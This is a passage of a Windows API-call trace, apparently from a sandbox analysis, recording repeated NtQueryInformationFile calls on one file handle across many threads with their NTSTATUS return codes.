0xa64 [0152.397] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffec8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffec8, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 620 os_tid = 0xa30 [0152.398] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf828, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf828, FileInformation=0x44d8128) returned 0x0 Thread: id = 621 os_tid = 0x388 [0152.400] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f868, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f868, FileInformation=0x44d8128) returned 0x0 Thread: id = 622 os_tid = 0x760 [0152.402] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fae8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fae8, FileInformation=0x44d8128) returned 0x0 Thread: id = 623 os_tid = 0xa54 [0152.403] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f828, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f828, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 624 os_tid = 0x738 [0152.405] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f788, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f788, FileInformation=0x44d8128) returned 0x0 Thread: id = 625 os_tid = 0x488 [0152.406] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fd58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fd58, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 626 os_tid = 0x6dc [0152.408] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f788, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f788, FileInformation=0x44d8128) returned 0x0 Thread: id = 627 os_tid = 0x7a0 [0152.409] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f810, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f810, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 628 os_tid = 0x73c [0152.411] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffc18, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffc18, FileInformation=0x44d8128) returned 0x0 Thread: id = 629 os_tid = 0x1c0 [0152.413] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f7e8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f7e8, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 630 os_tid = 0x7c4 [0152.414] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fd58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fd58, FileInformation=0x44d8128) returned 0x0 Thread: id = 631 os_tid = 0x790 [0152.416] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fc78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fc78, FileInformation=0x44d8128) returned 0x0 Thread: id = 632 os_tid = 0x688 [0152.418] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fd38, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fd38, FileInformation=0x44d8128) returned 0x0 Thread: id = 633 os_tid = 0x240 [0152.419] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efdc0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efdc0, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 634 os_tid = 0x8e0 [0152.438] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fc88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fc88, FileInformation=0x44d8098) returned 0x0 Thread: id = 635 os_tid = 0x880 [0152.441] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fa40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fa40, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 636 os_tid = 0x8f0 [0152.443] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efa40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efa40, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 637 os_tid = 0xa18 [0152.444] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfa20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfa20, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 638 os_tid = 0x8a0 [0152.446] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfca0, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 639 os_tid = 0x870 [0152.447] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fc10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fc10, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 640 os_tid = 0x9a0 [0152.449] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fcd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fcd8, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 641 os_tid = 0x2c4 [0152.451] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fa80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fa80, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 642 os_tid = 0x890 [0152.452] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fc48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fc48, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 643 os_tid = 0x4e8 [0152.454] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fdb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fdb0, FileInformation=0x44d8098) returned 0x0 Thread: id = 644 os_tid = 0xcc [0152.456] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fd00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fd00, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 645 os_tid = 0xd0 [0152.458] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f7e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f7e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 646 os_tid = 0xd4 [0152.461] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485ff00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485ff00, FileInformation=0x44d8098) returned 0x0 Thread: id = 647 os_tid = 0xd8 [0152.462] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff58, FileInformation=0x44d8098) returned 0x0 Thread: id = 648 os_tid = 0xdc [0152.464] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486ff60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486ff60, FileInformation=0x44d8098) returned 0x0 Thread: id = 649 os_tid = 0xe0 [0152.466] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fdf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fdf8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 650 os_tid = 0xe4 [0152.467] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f970, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f970, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 651 os_tid = 0xe8 [0152.469] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df8b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df8b0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 652 os_tid = 0xec [0152.470] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f970, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f970, FileInformation=0x44d8098) returned 0x0 Thread: id = 653 os_tid = 0x748 [0152.472] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432ff30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432ff30, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 654 os_tid = 0xc4 [0152.485] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fa98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fa98, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 655 os_tid = 0x620 [0152.487] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfdf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfdf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 656 os_tid = 0x910 [0152.489] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfce0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfce0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 657 os_tid = 0x950 [0152.491] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fe78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fe78, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 658 os_tid = 0x940 [0152.492] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fa48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fa48, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 659 os_tid = 0x980 [0152.494] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f8e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f8e0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 660 os_tid = 0xa10 [0152.496] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efb30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efb30, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 661 os_tid = 0x72c [0152.497] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef9d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef9d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 662 os_tid = 0x9e0 [0152.499] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fb50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fb50, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 663 os_tid = 0x9c4 [0152.501] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fd48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fd48, FileInformation=0x44d8098) returned 0x0 Thread: id = 664 os_tid = 0xa6c [0152.502] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fa90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fa90, FileInformation=0x44d8098) returned 0x0 Thread: id = 665 os_tid = 0xb00 [0152.504] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efa80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efa80, FileInformation=0x44d8098) returned 0x0 Thread: id = 666 os_tid = 0xaf8 [0152.510] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fad8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fad8, FileInformation=0x44d8098) returned 0x0 Thread: id = 667 os_tid = 0xae4 [0152.512] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfbe0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfbe0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 668 os_tid = 0x344 [0152.513] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f8e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f8e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 669 os_tid = 0x808 [0152.516] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfec0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfec0, FileInformation=0x44d8098) returned 0x0 Thread: id = 670 os_tid = 0x858 [0152.518] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fc38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fc38, FileInformation=0x44d8098) returned 0x0 Thread: id = 671 os_tid = 0x224 [0152.520] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfda8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfda8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 672 os_tid = 0x4dc [0152.523] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fbd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fbd0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 673 os_tid = 0x78c [0152.524] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fa38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fa38, FileInformation=0x44d8098) returned 0x0 Thread: id = 674 os_tid = 0xb0 [0152.526] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481faf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481faf0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 675 os_tid = 0x314 [0152.527] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fda0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fda0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 676 os_tid = 0x804 [0152.529] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f8e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f8e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 677 os_tid = 0x854 [0152.531] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfd28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfd28, FileInformation=0x44d8098) returned 0x0 Thread: id = 678 os_tid = 0xa78 [0152.532] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494f7d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494f7d0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 679 os_tid = 0x6a8 [0152.534] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f7f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f7f0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 680 os_tid = 0x7a8 [0152.535] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fec8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fec8, FileInformation=0x44d8098) returned 0x0 Thread: id = 681 os_tid = 0x330 [0152.537] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487ff10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487ff10, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 682 os_tid = 0x3a4 [0152.539] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f930, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f930, FileInformation=0x44d8098) returned 0x0 Thread: id = 683 os_tid = 0x67c [0152.540] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fc38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fc38, FileInformation=0x44d8098) returned 0x0 Thread: id = 684 os_tid = 0x5cc [0152.542] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f920, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f920, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 685 os_tid = 0x840 [0152.543] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efc40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efc40, FileInformation=0x44d8098) returned 0x0 Thread: id = 686 os_tid = 0x69c [0152.545] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f798, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f798, FileInformation=0x44d8098) returned 0x0 Thread: id = 687 os_tid = 0x6f0 [0152.547] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cff30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cff30, FileInformation=0x44d8098) returned 0x0 Thread: id = 688 os_tid = 0x810 [0152.549] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fee8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fee8, FileInformation=0x44d8098) returned 0x0 Thread: id = 689 os_tid = 0xa88 [0152.550] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fd08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fd08, FileInformation=0x44d8098) returned 0x0 Thread: id = 690 os_tid = 0x43c [0152.552] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fa88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fa88, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 691 os_tid = 0x670 [0152.554] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fd70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fd70, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 692 os_tid = 0xa14 [0152.556] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fce0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fce0, FileInformation=0x44d8098) returned 0x0 Thread: id = 693 os_tid = 0x990 [0152.558] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48ef978, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48ef978, FileInformation=0x44d8098) returned 0x0 Thread: id = 694 os_tid = 0x2dc [0152.559] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef918, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef918, FileInformation=0x44d8098) returned 0x0 Thread: id = 695 os_tid = 0x74c [0152.561] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476ff48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476ff48, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 696 os_tid = 0x3c4 [0152.562] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fbc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fbc0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 697 os_tid = 0x90 [0152.565] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47af910, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47af910, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 698 os_tid = 0x630 [0152.567] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efbd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efbd0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 699 os_tid = 0x124 [0152.569] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fc80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fc80, FileInformation=0x44d8098) returned 0x0 Thread: id = 700 os_tid = 0xc0 [0152.570] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff58, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 701 os_tid = 0x360 [0152.572] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fe70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fe70, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 702 os_tid = 0x920 [0152.574] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fbe8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fbe8, FileInformation=0x44d8098) returned 0x0 Thread: id = 703 os_tid = 0xbec [0152.575] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fca0, FileInformation=0x44d8098) returned 0x0 Thread: id = 704 os_tid = 0x6b8 [0152.578] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fc98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fc98, FileInformation=0x44d8098) returned 0x0 Thread: id = 705 os_tid = 0x30c [0152.580] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f968, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f968, FileInformation=0x44d8098) returned 0x0 Thread: id = 706 os_tid = 0xbfc [0152.582] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfa90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfa90, FileInformation=0x44d8098) returned 0x0 Thread: id = 707 os_tid = 0x3f8 [0152.584] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffca0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 708 os_tid = 0x6cc [0152.585] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fc58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fc58, FileInformation=0x44d8098) returned 0x0 Thread: id = 709 os_tid = 0x830 [0152.587] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f7d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f7d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 710 os_tid = 0x75c [0152.588] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f9c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f9c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 711 os_tid = 0x7f0 [0152.590] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fc08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fc08, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 712 os_tid = 0x710 [0152.591] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434ff30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434ff30, FileInformation=0x44d8098) returned 0x0 Thread: id = 713 os_tid = 0x5d8 [0152.593] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fb08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fb08, FileInformation=0x44d8098) returned 0x0 Thread: id = 714 os_tid = 0xbe4 [0152.595] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf7c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf7c8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 715 os_tid = 0x600 [0152.597] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fa70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fa70, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 716 os_tid = 0xbd0 [0152.598] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fb78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fb78, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 717 os_tid = 0x158 [0152.600] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486ff80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486ff80, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 718 os_tid = 0xbd8 [0152.602] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f970, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f970, FileInformation=0x44d8098) returned 0x0 Thread: id = 719 os_tid = 0xbe8 [0152.603] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef8d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef8d8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 720 os_tid = 0xbdc [0152.605] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fbf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fbf8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 721 os_tid = 0x5b4 [0152.607] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fda0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fda0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 722 os_tid = 0x614 [0152.608] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f7f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f7f0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 723 os_tid = 0x690 [0152.610] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fd00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fd00, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 724 os_tid = 0xa68 [0152.611] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fb88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fb88, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 725 os_tid = 0x7d0 [0152.613] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df7a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df7a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 726 os_tid = 0x7d8 [0152.619] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fcb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fcb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 727 os_tid = 0x24c [0152.621] 